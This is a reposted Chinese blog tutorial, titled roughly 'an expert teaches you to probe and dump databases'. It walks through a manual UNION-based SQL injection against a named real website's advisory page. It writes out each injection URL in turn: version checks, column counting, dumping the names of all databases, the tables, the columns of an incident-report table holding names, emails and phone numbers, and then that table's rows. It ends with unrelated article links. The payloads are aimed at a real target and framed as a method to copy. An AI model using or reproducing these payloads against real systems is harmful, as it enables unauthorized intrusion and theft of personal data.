博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
大牛教你查库暴库
阅读量:6638 次
发布时间:2019-06-25

本文共 2417 字,大约阅读时间需要 8 分钟。

http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询

2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解

http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--

3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--

数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。

4.判断有没有写权限

http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限

没办法,手动猜表啦

5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb

6.爆表,爆的是twcert库

http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5

7.爆列名,这次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status

8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。

http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--

返回是3,说明每个列里有3个地段。

9.爆字段内容

http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆出name列的第一个字段的内容。

http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--

爆出name列的第二个字段的内容。

本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/489519,如需转载请自行联系原作者

你可能感兴趣的文章
P3261 [JLOI2015]城池攻占
查看>>
MyBatis开发入门二:一对多连表查询
查看>>
洛谷——P2865 [USACO06NOV]路障Roadblocks
查看>>
POJ1191棋盘分割
查看>>
CF Exam (数学)
查看>>
这家素食店的牙签能吃——天厨妙香
查看>>
在UnrealEngine中用Custom节点实现毛玻璃的效果
查看>>
冒泡排序分析
查看>>
ORACLE数据库创建用户名和表空间
查看>>
oracle的监听器启动后一会儿便停止 再启动报错
查看>>
v4l2API无法执行VIDIOC_DQBUF的问题
查看>>
jdbc连接sqlsever2017的第一步
查看>>
PHP实现文件下载
查看>>
Echarts X轴时间类型
查看>>
Leangoo到底好在哪里?
查看>>
Firefly自动售货机解决方案
查看>>
操作系统的内存对齐机制学习笔记
查看>>
5款最好的免费Linux缓存系统
查看>>
Web开发者必知的12款jQuery插件
查看>>
一起谈.NET技术,.NET简谈观察者模式
查看>>